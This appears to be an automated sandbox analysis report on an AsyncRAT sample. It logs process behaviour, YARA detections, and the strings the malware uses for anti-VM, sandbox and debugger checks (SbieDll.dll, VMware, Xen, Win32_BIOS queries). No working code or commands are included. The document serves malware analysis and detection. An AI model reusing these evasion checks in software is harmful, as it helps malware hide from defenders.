Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Hzoynygqzv.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ouopxupnarf.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ouopxupnarf.exe PID: 7984, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.Ouopxupnarf.exe.34c4d24.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30ff474.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30b1758.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ouopxupnarf.exe.347dcf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.31523b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.310b37c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1843584500.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hzoynygqzv.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ouopxupnarf.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ouopxupnarf.exe PID: 7984, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Hzoynygqzv.exe, 00000003.00000002.1645792371.000000000306F000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL@\^Q0SELECT * FROM WIN32_BIOS
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Hzoynygqzv.exe, 00000003.00000002.1645792371.000000000306F000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL@\^Q
Source: Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORER9SBIEDLL.DLL:SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE;VERSION<SERIALNUMBER>VMWARE\|VIRTUAL\|A M I\|XEN?SELECT * FROM WIN32_COMPUTERSYSTEM@MANUFACTURERAMODELBMICROSOFT\|VMWARE\|VIRTUALCJOHNDANNAEXXXXXXXX

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Memory allocated: 12B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Memory allocated: 4D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 25B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 45B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Memory allocated: 1590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Memory allocated: 1440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Memory allocated: 4DC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: F00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 12A0000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7108	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2580	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2816	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7031	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe TID: 7444	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7676	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7700	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7708	Thread sleep count: 2816 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7708	Thread sleep count: 7031 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe TID: 7780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7872	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe TID: 8008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware\V
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual@\^q
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CELXU FUEHC8UW8L@\^q0VMware\|VIRTUAL\|A M I\|Xen
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorer9SbieDll.dll:select * from Win32_BIOS8Unexpected WMI query failure;version<SerialNumber>VMware\|VIRTUAL\|A M I\|Xen?select * from Win32_ComputerSystem@manufacturerAmodelBMicrosoft\|VMWare\|VirtualCjohnDannaExxxxxxxx
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DaFHXXfENy7CYmZ CB MYmpm@\^q0Microsoft\|VMWare\|Virtual
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareLR^q
Source: Hzoynygqzv.exe, 00000003.00000002.1645792371.000000000306F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWareLR^q(7
Source: Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareLR^q,\|D
Source: InstallUtil.exe, 00000005.00000002.2890976907.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWareLR^q,
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen@\^q
Source: InstallUtil.exe, 00000005.00000002.2907837508.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907647169.0000000004D25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWareLR^q
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q 1:en-CH:Microsoft\|VMWare\|Virtual
Source: Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe

Code function: 3_2_0542FB28 CheckRemoteDebuggerPresent,

3_2_0542FB28

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process queried: DebugPort

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
